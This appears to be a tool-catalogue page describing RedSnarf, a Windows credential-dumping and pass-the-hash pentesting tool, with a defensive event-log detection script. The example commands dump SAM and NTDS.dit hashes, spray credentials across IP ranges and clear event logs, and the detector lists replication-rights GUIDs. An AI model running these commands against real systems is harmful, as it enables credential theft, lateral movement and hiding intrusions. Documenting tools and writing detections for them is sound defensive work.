Tags: Post Exploitation, windows, credentials, hashes, pentesting, redteaming, lsa, sam, pass-the-hash

RedSnarf

Pentesting tool for retrieving credentials from Windows workstations, servers, and domain controllers using OpSec safe techniques. Supports hash retrieval, credential enumeration, pass-the-hash, and hash spraying.

Description

RedSnarf is a pentesting and redteaming tool developed by Ed Williams for extracting hashes and credentials from Windows systems. It retrieves local SAM hashes, the LSA secrets of users with elevated privileges, and MS cached credentials, and it enables pass-the-hash attacks. The tool also identifies weak username/password combinations such as administrator/Password01 and supports retrieving hashes across ranges with its hash spraying capability.

Use cases include post-exploitation scenarios on workstations, servers, and domain controllers where authenticated access has already been obtained. Its OpSec safe methods are intended to dump credentials without triggering obvious alerts. Additional utilities cover enumeration, registry manipulation, and integration with other tools such as creddump7.

RedSnarf Version 0.5p provides a rich feature set for pentesting, including hash extraction via drsuapi or NTDSUtil, service account enumeration, and various credential validation options.

How It Works

RedSnarf authenticates to Windows targets using provided credentials or hashes via SMB protocols and Impacket libraries. It extracts local SAM hashes, LSA secrets from elevated users, and cached domain credentials. For domain controllers, it uses methods like DRSUAPI or NTDSUtil to dump NTDS.dit. Pass-the-hash leverages NTLM hashes for lateral movement, while hash spraying tests multiple hashes across ranges. Enumeration queries LDAP, services, and registry keys; utilities execute PowerShell, clear logs, or deploy shells OpSec-safely.
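Of the behaviours described above, the DRSUAPI replication request against a domain controller and the event-log clear leave the clearest audit trail. The script below is an added detection example, not code from RedSnarf or from this page: it scans constructed Windows Security events, assumed to be exported as JSON lines with EventID, SubjectUserName and (for 4662) Properties fields, and flags a 4662 that requests the directory replication control-access GUIDs from an account that is not a domain controller, as well as any 1102 log-clear event. The account names and the set of allowed DC machine accounts are assumptions.

```python
import json

# Control-access right GUIDs requested by directory replication reads
# (the rights a DRSUAPI-style NTDS.dit dump needs on the domain object).
REPL_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
}


def analyse_events(events, dc_accounts):
    """Return (severity, reason, account) findings for suspicious events.

    events: iterable of dicts using the assumed field names below.
    dc_accounts: machine accounts (e.g. 'DC01$') that legitimately replicate.
    """
    findings = []
    for ev in events:
        eid = ev.get("EventID")
        who = ev.get("SubjectUserName", "?")
        if eid == 4662:
            props = ev.get("Properties", "").lower()
            if any(g in props for g in REPL_GUIDS) and who not in dc_accounts:
                findings.append(("high", "replication rights used by non-DC account", who))
        elif eid == 1102:  # "The audit log was cleared"
            findings.append(("high", "security log cleared", who))
    return findings


def analyse_log(text, dc_accounts):
    """Parse JSON-lines export (one event per line) and analyse it."""
    events = (json.loads(line) for line in text.splitlines() if line.strip())
    return analyse_events(events, dc_accounts)


# Constructed sample export, not real telemetry.
SAMPLE_LOG = """\
{"EventID": 4662, "SubjectUserName": "DC01$", "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"}
{"EventID": 4662, "SubjectUserName": "administrator", "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"}
{"EventID": 4624, "SubjectUserName": "administrator"}
{"EventID": 1102, "SubjectUserName": "administrator"}
"""

if __name__ == "__main__":
    for severity, reason, account in analyse_log(SAMPLE_LOG, {"DC01$"}):
        print(f"[{severity}] {reason}: {account}")
```

The replication request from DC01$ is ignored as normal inter-DC traffic; the same request from administrator and the subsequent log clear are both reported.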

Installation

sudo apt install redsnarf

Flags

-H, --host HOST  Specify a hostname (-H ip=), a range (-H range=) or a targets file (-H file=) to grab hashes from
-u, --username USERNAME  Enter a username
-p, --password PASSWORD  Enter a password or hash
-d, --domain_name DOMAIN_NAME  <Optional> Enter domain name
-cC, --credpath CREDPATH  <Optional> Enter path to creddump7, default /usr/share/creddump7/
-cM, --mergepf MERGEPF  <Optional> Enter output path and filename to merge multiple pwdump files, default /tmp/merged.txt
-cO, --outputpath OUTPUTPATH  <Optional> Enter output path, default /tmp/
-cQ, --quick_validate QUICK_VALIDATE  <Optional> Quickly validate credentials
-uA, --auto_complete AUTO_COMPLETE  <Optional> Copy autocomplete file to /etc/bash_completion.d
-uC, --clear_event CLEAR_EVENT  <Optional> Clear event log: application, security, setup or system
-hI, --drsuapi DRSUAPI  <Optional> Extract NTDS.dit hashes using the drsuapi method; accepts a machine name as username
-hN, --ntds_util NTDS_UTIL  <Optional> Extract NTDS.dit using NTDSUtil
-eA, --service_accounts SERVICE_ACCOUNTS  <Optional> Enumerate service accounts, if any

Examples

Show the help message and usage information
redsnarf -h
Retrieve hashes from a single host using provided credentials
./redsnarf -H ip=192.168.0.1 -u administrator -p Password1
Grab hashes from an IP range
redsnarf -H range=192.168.0.0/24 -u administrator -p Password1
Grab hashes from a targets file
redsnarf -H file=targets.txt -u administrator -p Password1
Quickly validate credentials on a host
redsnarf -H ip=192.168.0.1 -u administrator -p Password1 -cQ
Extract NTDS.dit hashes using DRSUAPI method
redsnarf -H ip=192.168.0.1 -u administrator -p Password1 -hI
Clear event logs on the target
redsnarf -H ip=192.168.0.1 -u administrator -p Password1 -uC
Updated 2026-04-16 (source: kali.org)